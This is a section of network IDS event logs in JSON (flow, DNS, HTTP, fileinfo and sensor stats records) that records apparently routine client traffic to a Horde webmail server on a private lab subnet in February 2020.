{"timestamp":"2020-02-29T00:16:49.000487+0000","flow_id":223250995218985,"event_type":"flow","src_ip":"192.168.10.122","src_port":58990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:48.199209+0000","end":"2020-02-29T00:11:48.307119+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:49.880408+0000","flow_id":1781907531591448,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45792,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64725,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:49.985303+0000","flow_id":1781907531591448,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45792,"proto":"UDP","dns":{"type":"answer","id":64725,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:49.985303+0000","flow_id":1781907531591448,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45792,"proto":"UDP","dns":{"type":"answer","id":64725,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:16:50.000174+0000","event_type":"stats","stats":{"uptime":14662,"capture":{"kernel_packets":136226,"kernel_drops":0},"decoder":{"pkts":136232,"bytes":93672396,"invalid":189,"ipv4":134712,"ipv6":9,"ethernet":136232,"raw":0,"null":0,"sll":0,"tcp":129318,"udp":5190,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2800,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2816,"synack":2807,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":144,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1838,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2374,"failed_udp":112},"tx":{"http":4703,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2454}},"flow_mgr":{"closed_pruned":2777,"new_pruned":15,"est_pruned":2423,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21489,"memcap_state":0,"memcap_global":0},"http":{"memuse":41010,"memcap":0}}} 
{"timestamp":"2020-02-29T00:16:50.079654+0000","flow_id":607027817694435,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34862,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/add.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=oZ_HnvDV1RzcsAiiL_PzNnX&view=Contact","length":20}} {"timestamp":"2020-02-29T00:16:50.089117+0000","flow_id":1807681630395421,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57626,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16564,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:50.197597+0000","flow_id":1807681630395421,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57626,"proto":"UDP","dns":{"type":"answer","id":16564,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:50.197597+0000","flow_id":1807681630395421,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57626,"proto":"UDP","dns":{"type":"answer","id":16564,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:16:52.000170+0000","flow_id":413251773933581,"event_type":"flow","src_ip":"192.168.10.130","src_port":34844,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":9,"bytes_toserver":1155,"bytes_toclient":7733,"start":"2020-02-29T00:15:44.862221+0000","end":"2020-02-29T00:15:50.145157+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:52.301543+0000","flow_id":363769459871467,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34860,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":45},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":27,"tx_id":0}} {"timestamp":"2020-02-29T00:16:53.000301+0000","flow_id":862814588722720,"event_type":"flow","src_ip":"192.168.10.130","src_port":34842,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1210,"bytes_toclient":890,"start":"2020-02-29T00:15:13.613920+0000","end":"2020-02-29T00:15:52.465705+0000","age":39,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:16:53.000509+0000","flow_id":447486943095378,"event_type":"flow","src_ip":"192.168.10.122","src_port":40980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:52.846418+0000","end":"2020-02-29T00:11:52.954641+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:53.000898+0000","flow_id":2078036930179823,"event_type":"flow","src_ip":"192.168.10.130","src_port":34840,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":28,"pkts_toclient":34,"bytes_toserver":4469,"bytes_toclient":36316,"start":"2020-02-29T00:15:09.176879+0000","end":"2020-02-29T00:15:52.465550+0000","age":43,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:56.000995+0000","flow_id":623112466345782,"event_type":"flow","src_ip":"192.168.10.130","src_port":34846,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1143,"bytes_toclient":8792,"start":"2020-02-29T00:15:50.208694+0000","end":"2020-02-29T00:15:55.405377+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:16:57.000323+0000","event_type":"stats","stats":{"uptime":14669,"capture":{"kernel_packets":136283,"kernel_drops":0},"decoder":{"pkts":136286,"bytes":93702366,"invalid":191,"ipv4":134764,"ipv6":9,"ethernet":136286,"raw":0,"null":0,"sll":0,"tcp":129364,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2780,"new_pruned":15,"est_pruned":2425,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":3,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21490,"memcap_state":0,"memcap_global":0},"http":{"memuse":2112,"memcap":0}}} 
{"timestamp":"2020-02-29T00:16:59.002148+0000","flow_id":2200121362976242,"event_type":"flow","src_ip":"192.168.10.122","src_port":47304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:11:57.953842+0000","end":"2020-02-29T00:11:58.181226+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:04.000248+0000","event_type":"stats","stats":{"uptime":14676,"capture":{"kernel_packets":136285,"kernel_drops":0},"decoder":{"pkts":136288,"bytes":93702498,"invalid":191,"ipv4":134766,"ipv6":9,"ethernet":136288,"raw":0,"null":0,"sll":0,"tcp":129366,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2781,"new_pruned":15,"est_pruned":2426,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked
":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":2112,"memcap":0}}} {"timestamp":"2020-02-29T00:17:09.000342+0000","flow_id":173927609846779,"event_type":"flow","src_ip":"fe80:0000:0000:0000:fc16:3eff:fe73:695a","dest_ip":"ff02:0000:0000:0000:0000:0000:0000:0002","proto":"IPv6-ICMP","icmp_type":133,"icmp_code":0,"flow":{"pkts_toserver":1,"pkts_toclient":0,"bytes_toserver":70,"bytes_toclient":0,"start":"2020-02-29T00:16:38.117755+0000","end":"2020-02-29T00:16:38.117755+0000","age":0,"state":"new","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:10.000893+0000","flow_id":544162378397647,"event_type":"flow","src_ip":"192.168.10.81","src_port":52762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1157,"bytes_toclient":9925,"start":"2020-02-29T00:16:03.964559+0000","end":"2020-02-29T00:16:09.219655+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:17:11.000250+0000","event_type":"stats","stats":{"uptime":14683,"capture":{"kernel_packets":136285,"kernel_drops":0},"decoder":{"pkts":136288,"bytes":93702498,"invalid":191,"ipv4":134766,"ipv6":9,"ethernet":136288,"raw":0,"null":0,"sll":0,"tcp":129366,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2781,"new_pruned":15,"est_pruned":2426,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":2032,"memcap":0}}} 
{"timestamp":"2020-02-29T00:17:14.000486+0000","flow_id":198980151024429,"event_type":"flow","src_ip":"192.168.10.130","src_port":34848,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1102,"bytes_toclient":774,"start":"2020-02-29T00:15:52.465709+0000","end":"2020-02-29T00:16:13.631724+0000","age":21,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:18.000223+0000","event_type":"stats","stats":{"uptime":14690,"capture":{"kernel_packets":136285,"kernel_drops":0},"decoder":{"pkts":136288,"bytes":93702498,"invalid":191,"ipv4":134766,"ipv6":9,"ethernet":136288,"raw":0,"null":0,"sll":0,"tcp":129366,"udp":5194,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2801,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2817,"synack":2808,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1839,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2376,"failed_udp":112},"tx":{"http":4704,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2456}},"flow_mgr":{"closed_pruned":2783,"new_pruned":16,"est_pruned":2426,"bypass
ed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":1952,"memcap":0}}} {"timestamp":"2020-02-29T00:17:19.118914+0000","flow_id":1653011270062210,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44867,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44829,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:19.227917+0000","flow_id":1653011270062210,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44867,"proto":"UDP","dns":{"type":"answer","id":44829,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:19.227917+0000","flow_id":1653011270062210,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44867,"proto":"UDP","dns":{"type":"answer","id":44829,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:19.438006+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8119}} 
{"timestamp":"2020-02-29T00:17:21.000492+0000","flow_id":1584978968453450,"event_type":"flow","src_ip":"192.168.10.122","src_port":54606,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:20.598346+0000","end":"2020-02-29T00:12:20.707223+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:21.000827+0000","flow_id":1230407958635898,"event_type":"flow","src_ip":"192.168.10.130","src_port":34850,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:16:13.632186+0000","end":"2020-02-29T00:16:20.087703+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:23.000471+0000","flow_id":1032113613812835,"event_type":"flow","src_ip":"192.168.10.81","src_port":52764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1143,"bytes_toclient":712,"start":"2020-02-29T00:16:17.570467+0000","end":"2020-02-29T00:16:22.723356+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:23.525111+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52768,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8119},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47734,"tx_id":0}} {"timestamp":"2020-02-29T00:17:23.536842+0000","flow_id":1688526354854154,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34841,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31688,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:23.645551+0000","flow_id":1688526354854154,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34841,"proto":"UDP","dns":{"type":"answer","id":31688,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:23.645551+0000","flow_id":1688526354854154,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34841,"proto":"UDP","dns":{"type":"answer","id":31688,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:23.720422+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5559}} 
{"timestamp":"2020-02-29T00:17:25.000160+0000","event_type":"stats","stats":{"uptime":14697,"capture":{"kernel_packets":136295,"kernel_drops":0},"decoder":{"pkts":136310,"bytes":93713038,"invalid":191,"ipv4":134787,"ipv6":10,"ethernet":136310,"raw":0,"null":0,"sll":0,"tcp":129385,"udp":5196,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2802,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2818,"synack":2809,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":145,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1840,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":104,"dcerpc_udp":0,"dns_udp":2377,"failed_udp":112},"tx":{"http":4705,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2457}},"flow_mgr":{"closed_pruned":2784,"new_pruned":16,"est_pruned":2427,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21489,"memcap_state":0,"memcap_global":0},"http":{"memuse":53624,"memcap":0}}} 
{"timestamp":"2020-02-29T00:17:26.393012+0000","flow_id":256953625804596,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54415,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":60400,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:26.501632+0000","flow_id":256953625804596,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54415,"proto":"UDP","dns":{"type":"answer","id":60400,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:26.501632+0000","flow_id":256953625804596,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54415,"proto":"UDP","dns":{"type":"answer","id":60400,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:26.651304+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34864,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=oZ_HnvDV1RzcsAiiL_PzNnX&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6988}} {"timestamp":"2020-02-29T00:17:27.159302+0000","flow_id":1466579625143878,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60762,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35202,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
